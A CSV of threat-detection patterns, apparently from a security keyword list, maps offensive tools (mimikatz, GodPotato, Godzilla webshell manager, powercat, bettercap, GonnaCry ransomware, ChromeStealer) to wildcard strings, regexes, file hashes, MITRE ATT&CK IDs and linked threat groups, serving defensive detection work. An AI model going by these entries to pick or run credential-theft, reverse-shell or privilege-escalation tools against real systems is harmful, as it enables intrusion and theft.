"*bef212d845d5f4f1ed2413b300548cc9181641fe773a25c7a0f7ea021a50bb40*",".{0,1000}bef212d845d5f4f1ed2413b300548cc9181641fe773a25c7a0f7ea021a50bb40.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","35777"
"*befbdaf08e78ab9ee8e418215b4a22102576ab472c73324ec59a6b890be1b5b3*",".{0,1000}befbdaf08e78ab9ee8e418215b4a22102576ab472c73324ec59a6b890be1b5b3.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#filehash #linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","35781"
"*before-create-implant-callback*",".{0,1000}before\-create\-implant\-callback.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35782"
"*before-create-implant-io-bin*",".{0,1000}before\-create\-implant\-io\-bin.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35783"
"*before-find-implant-chunks*",".{0,1000}before\-find\-implant\-chunks.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","35784"
"*BeichenDream/BadPotato*",".{0,1000}BeichenDream\/BadPotato.{0,1000}","offensive_tool_keyword","BadPotato","Windows Privilege Escalation Exploit BadPotato","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","Earth Lusca","Privilege Escalation","https://github.com/BeichenDream/BadPotato","1","1","N/A","N/A","10","9","836","136","2020-05-10T15:42:21Z","2020-05-10T10:01:20Z","35804"
"*BeichenDream/Chunk-Proxy*",".{0,1000}BeichenDream\/Chunk\-Proxy.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","35805"
"*BeichenDream/GodPotato*",".{0,1000}BeichenDream\/GodPotato.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","1","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","35806"
"*BeichenDream/Godzilla*",".{0,1000}BeichenDream\/Godzilla.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35807"
"*BeichenDream/SharpToken*",".{0,1000}BeichenDream\/SharpToken.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","1","N/A","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","35808"
"*beichendream@gmail.com*",".{0,1000}beichendream\@gmail\.com.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","#email","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","35809"
"*Ben0xA/DoUCMe*",".{0,1000}Ben0xA\/DoUCMe.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","1","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","35810"
"*Benjamin Delpy - RDP Session Tradecraft*",".{0,1000}Benjamin\sDelpy\s\-\sRDP\sSession\sTradecraft.{0,1000}","offensive_tool_keyword","SharpRDPHijack","SharpRDPHijack is a proof-of-concept .NET/C# Remote Desktop Protocol (RDP) session hijack utility for disconnected sessions","T1021.001 - T1078.003 - T1059.001","TA0002 - TA0008 - TA0006","N/A","N/A","Lateral Movement","https://github.com/bohops/SharpRDPHijack","1","0","#content","N/A","10","5","480","80","2024-11-28T06:08:58Z","2020-07-06T02:59:46Z","35811"
"*benjamin@gentilkiwi.com*",".{0,1000}benjamin\@gentilkiwi\.com.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz default strings","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","#email","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","35812"
"*Bernardocarlos@tutanota.com*",".{0,1000}Bernardocarlos\@tutanota\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","35813"
"*BernKing/ChromeStealer*",".{0,1000}BernKing\/ChromeStealer.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","1","N/A","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","35814"
"*beRoot.exe -*",".{0,1000}beRoot\.exe\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35815"
"*beroot.py -*",".{0,1000}beroot\.py\s\-.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35816"
"*BeRoot-master*",".{0,1000}BeRoot\-master.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","35817"
"*besimorhino/powercat*",".{0,1000}besimorhino\/powercat.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","1","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","35819"
"*BesoToken.exe list*",".{0,1000}BesoToken\.exe\slist.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","35820"
"*BesoToken-master*",".{0,1000}BesoToken\-master.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","1","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","35821"
"*besside-ng -W -v *",".{0,1000}besside\-ng\s\-W\s\-v\s.{0,1000}","offensive_tool_keyword","aircrack","cracking Wi-Fi security including WEP and WPA/WPA2-PSK encryption","T1078 - T1496 - T1040","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","35822"
"*best*phish her*",".{0,1000}best.{0,1000}phish\sher.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","Black Basta","Phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","N/A","10","1073","138","2024-06-19T21:41:55Z","2023-07-03T02:19:47Z","35823"
"*bestcrypt2john.py*",".{0,1000}bestcrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35824"
"*bestcryptve2john.py*",".{0,1000}bestcryptve2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","35825"
"*BetterBackdoor*",".{0,1000}BetterBackdoor.{0,1000}","offensive_tool_keyword","BetterBackdoor","A backdoor is a tool used to gain remote access to a machine.","T1071 - T1055 - T1059 - T1053","TA0002 - TA0006 - TA0008","N/A","N/A","Persistence","https://github.com/thatcherclough/BetterBackdoor","1","1","N/A","N/A","N/A","3","280","86","2024-10-03T18:44:04Z","2019-07-29T14:45:24Z","35826"
"*bettercap *",".{0,1000}bettercap\s.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","0","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35827"
"*bettercap -iface eth0*",".{0,1000}bettercap\s\-iface\seth0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","35828"
"*bettercap.*",".{0,1000}bettercap\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35829"
"*bettercap_.deb*",".{0,1000}bettercap_\.deb.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35830"
"*bettercap-master.zip*",".{0,1000}bettercap\-master\.zip.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","35831"
"*betterdefaultpasslist*",".{0,1000}betterdefaultpasslist.{0,1000}","offensive_tool_keyword","betterdefaultpasslist","list includes default credentials from various manufacturers for their products like NAS. ERP. ICS etc.. that are used for standard products like mssql. vnc. oracle and so on useful for network bruteforcing","T1110 - T1111 - T1112 - T1113 - T1114 - T1115 - T1116 - T1117 - T1118 - T1119","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/govolution/betterdefaultpasslist","1","1","N/A","N/A","N/A","7","605","134","2024-10-04T18:03:58Z","2016-09-24T16:21:44Z","35832"
"*BetterSafetyKatz.*",".{0,1000}BetterSafetyKatz\..{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35833"
"*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","BetterSafetyKatz","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35834"
"*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","35835"
"*BetterSafetyKatz.exe*",".{0,1000}BetterSafetyKatz\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","BetterSafetyKatz","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","35836"
"*better-sliver-master.zip*",".{0,1000}better\-sliver\-master\.zip.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/gsmith257-cyber/better-sliver","1","1","N/A","N/A","10","10","98","10","2024-07-22T12:32:16Z","2023-12-12T02:04:36Z","35837"
"*BetterXencrypt.ps1*",".{0,1000}BetterXencrypt\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","35838"
"*bf05f1f8aa31c121f30b013e644b75f8ec16c23c6041140408c76d07b003738c*",".{0,1000}bf05f1f8aa31c121f30b013e644b75f8ec16c23c6041140408c76d07b003738c.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","35841"
"*bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41*",".{0,1000}bf07c8fc6c899e793274614b8a98565fbedba9516c437c7594fec9fa15dd4d41.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35842"
"*bf36e85524877406694ccb4591a92b344b4e2778cedeba1dfac0ce1a30a4f80c*",".{0,1000}bf36e85524877406694ccb4591a92b344b4e2778cedeba1dfac0ce1a30a4f80c.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","35849"
"*bf3aed0e31aca1ff3d43724f9f3f8248396a9cb0bbf234c0830b6a4999570d16*",".{0,1000}bf3aed0e31aca1ff3d43724f9f3f8248396a9cb0bbf234c0830b6a4999570d16.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","35850"
"*bf40b50a1cb293cadf36aa0a2fe3309b682f08858a58bf6231042258e78a13dc*",".{0,1000}bf40b50a1cb293cadf36aa0a2fe3309b682f08858a58bf6231042258e78a13dc.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","35851"
"*bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d*",".{0,1000}bf436bdcf33e8567d57edad7e673c9bcf6b4eb9a514d95c94a85418e964e4f8d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","35852"
"*BF45108E-1E43-486B-A71D-5426BBB041DB*",".{0,1000}BF45108E\-1E43\-486B\-A71D\-5426BBB041DB.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","35853"
"*bf4680186f616fbb0bf0a3cb01f520d8bca46d6100218ebb26de90b1ee3adaff*",".{0,1000}bf4680186f616fbb0bf0a3cb01f520d8bca46d6100218ebb26de90b1ee3adaff.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35854"
"*bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03*",".{0,1000}bf46b919a1f3f45d5d31393ca62e1fd8269f49f6b9a6289258867908c5a80b03.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35855"
"*bf47e463172e963f10b9c7e29995ef10b833b6d5cc0fd5a63bae1bd8d69410a1*",".{0,1000}bf47e463172e963f10b9c7e29995ef10b833b6d5cc0fd5a63bae1bd8d69410a1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","35856"
"*bf493db1ee23d91edc7d9085c6a37052e3d82c5a471cd6a9fdce92e401a89090*",".{0,1000}bf493db1ee23d91edc7d9085c6a37052e3d82c5a471cd6a9fdce92e401a89090.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","35857"
"*bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5*",".{0,1000}bf514687e7c94c53072505b6e7e2e9ce0f318d95d5db4789694ca0851967c1f5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","35858"
"*bf52295b55072f08f18712abd36ed4c4c276c7affedb57e6e54d7fd2bc7e0b9c*",".{0,1000}bf52295b55072f08f18712abd36ed4c4c276c7affedb57e6e54d7fd2bc7e0b9c.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","35859"
"*bf582077bbb7f317facb3705803f51a76fe47e740ff78c8dc0e393b32b6bbb10*",".{0,1000}bf582077bbb7f317facb3705803f51a76fe47e740ff78c8dc0e393b32b6bbb10.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","35860"
"*bf5a2aafdd2a8719cc733808bdb7009e6a7d4e6b889faa8a52e95b5ecc5d2337*",".{0,1000}bf5a2aafdd2a8719cc733808bdb7009e6a7d4e6b889faa8a52e95b5ecc5d2337.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","35861"
